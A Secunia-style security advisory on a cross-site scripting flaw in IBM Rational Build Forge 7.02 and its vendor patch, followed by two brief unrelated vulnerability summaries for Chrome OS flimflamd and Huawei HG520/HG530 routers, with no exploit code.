Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43180/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43180 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in IBM Rational Build Forge, which can be exploited by malicious people to conduct cross-site scripting attacks. Certain input passed to fullcontrol/ is not properly sanitised before being returned to the user. The vulnerability is reported in version 7.02. SOLUTION: Apply APAR PM05187. PROVIDED AND/OR DISCOVERED BY: The vendor credits a customer. ORIGINAL ADVISORY: IBM (PM05187): http://www.ibm.com/support/docview.wss?uid=swg1PM05187 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Use-after-free vulnerability in flimflamd in flimflam in Google Chrome OS before 0.9.130.14 Beta allows user-assisted remote attackers to cause a denial of service (daemon crash) by providing the name of a hidden WiFi network that does not respond to connection attempts. Google Chrome OS is a lightweight computer operating system development program developed by Google to develop a cloud operating system dedicated to the Internet. A post-release vulnerability exists in flimflamd in flimflam prior to Google Chrome OS 0.9.130.14 Beta. Successful exploits will cause the affected application to crash, effectively denying service to legitimate users. Due to the nature of this issue, remote code execution may be possible; this has not been confirmed

Huwea HG520/HG530 are prone to a security weakness that may allow attackers to generate default WEP/WPA keys. Successfully exploiting this issue may allow attackers to generate the WEP/WPA key using the MAC address. This may lead to other attacks.